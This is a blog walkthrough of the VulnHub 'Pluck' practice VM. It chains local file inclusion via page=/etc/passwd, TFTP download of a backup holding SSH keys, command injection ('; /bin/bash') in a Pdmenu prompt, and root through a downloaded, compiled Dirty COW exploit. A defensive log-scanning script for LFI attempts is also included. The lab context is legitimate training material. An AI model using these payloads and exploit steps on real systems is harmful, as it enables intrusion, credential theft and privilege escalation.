
Pluck Walkthrough (VulnHub)

Hello Hackers.
Welcome to another walkthrough. This time we'll look at another VM: Pluck is a new VM on VulnHub and it's very easy to hack. It is very good practice for newbie hackers who want to explore their hacking skills.

 

We know the target IP: 10.0.0.15 (in my case)

Download Link : https://download.vulnhub.com/pluck/pluck.ova.zip

 

Now let's start our walkthrough.


Scan the VM using nmap

COMMAND

nmap -p- -sV 10.0.0.15

Now we know the server's port 80 is open, which means the server hosts a website.


Scanning for Vulnerabilities and Exploiting

Explore this website and search for vulnerabilities. When I visited its About and Contact Us pages I noticed the URL: it shows a page=about.php parameter that takes a .php file.

I decided to try a Local File Inclusion (LFI) attack.

Payload: /etc/passwd

The URL looks like: http://10.0.0.15/index.php?page=/etc/passwd

Note: the end of the file leaks the path and name of a backup script (highlighted in the image above).

Now the URL is: http://10.0.0.15/index.php?page=/usr/local/scripts/backup.sh

This script contains very useful information (see the highlighted text in the picture above).

Now we know the server uses the TFTP protocol to back up its data.
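The requests above as they would look from the defender's side, as an added example that is not part of the original walkthrough: a Python check that scans web access logs for page= values that are not a plain .php file name. The log lines are constructed, and the allowlist pattern for legitimate values is an assumption based on about.php; it also covers percent-encoded and relative-path variants, which goes beyond the two requests shown here.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines for illustration (not captured from the VM).
SAMPLE_LOG = """\
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 1200
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=/etc/passwd HTTP/1.1" 200 2400
10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=%2Fusr%2Flocal%2Fscripts%2Fbackup.sh HTTP/1.1" 200 900
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2400
10.0.0.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 1100
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumption: legitimate values look like about.php (bare file name, no directories).
SAFE_PAGE_RE = re.compile(r'^[A-Za-z0-9_-]+\.php$')

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so %252f and %2f both end up as '/'."""
    for _ in range(max_rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(page):
    """Return None for an expected value, otherwise a short reason string."""
    if SAFE_PAGE_RE.match(page):
        return None
    if page.startswith("/"):
        return "absolute-path"
    if ".." in page:
        return "traversal"
    return "unexpected-value"

def find_lfi_attempts(log_text, param="page"):
    """Return (client, decoded value, reason, status) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for raw in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
            page = fully_decode(raw)
            reason = classify(page)
            if reason:
                findings.append((client, page, reason, int(status)))
    return findings

if __name__ == "__main__":
    print(*find_lfi_attempts(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request is the case to triage first, since it suggests the file was actually served.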

Let's fire up our terminal and type:

tftp 10.0.0.15

We know the backup file name is backup.tar

tftp> get backup.tar

Go to your local directory and extract backup.tar.

In the backup's home directory there are 3 users, but only paul has keys.

Use paul's keys to log in over SSH (try each key).

Let's try SSH. Fire up your terminal and type:

ssh -i id_key4 paul@10.0.0.15

Pdmenu appears. I was stuck there for some minutes figuring out what to do next.

So I decided to select the Edit file option in Pdmenu.

When I clicked Edit file, it showed a prompt for a name.

In the prompt I typed " ; id " (without quotes) and pressed Enter. <-- This vulnerability is known as command injection.

When you press Enter the Vim screen comes up; just type " :q " (without quotes).

After exiting Vim you can see the output of the command you injected in the prompt.

Repeat the last two steps: go to Edit file, but this time type "; /bin/bash " in the prompt.

If you did everything correctly, the output is below.

We got paul's shell.


Privilege Escalation

Now the final step is privilege escalation. To get root privileges, first check the kernel version (there are many ways to get root access).

uname -a

The kernel version is: 4.8.0

Dirty COW is the best vulnerability for this version of the kernel.

URL link: https://www.exploit-db.com/exploits/40616/

Download this exploit into paul's home directory using the wget command.

wget https://www.exploit-db.com/download/40616

mv 40616 dirtycow.c

Now compile and run dirtycow.c

gcc dirtycow.c -o dirtycow -pthread

./dirtycow

We got root privileges. woooooooooooooooooh

cat /root/flag.txt

 

 

Thank you. Comment Below for more

 

 



4 Comments

  1. That is a great tip especially to those fresh to
    the blogosphere. Short but very accurate information… Appreciate your
    sharing this one. A must read post!

    • Touhid Shaikh Touhid Shaikh

      thanks For Appreciating Me….

  2. Touche. Sound arguments. Keep up the amazing work.

  3. Hey very cool blog!! Man .. Excellent ..
    Wonderful .. I will bookmark your website and take the feeds additionally?
    I am happy to find numerous helpful info right
    here within the post, we need develop extra strategies on this regard, thank you for sharing.
    . . . . .
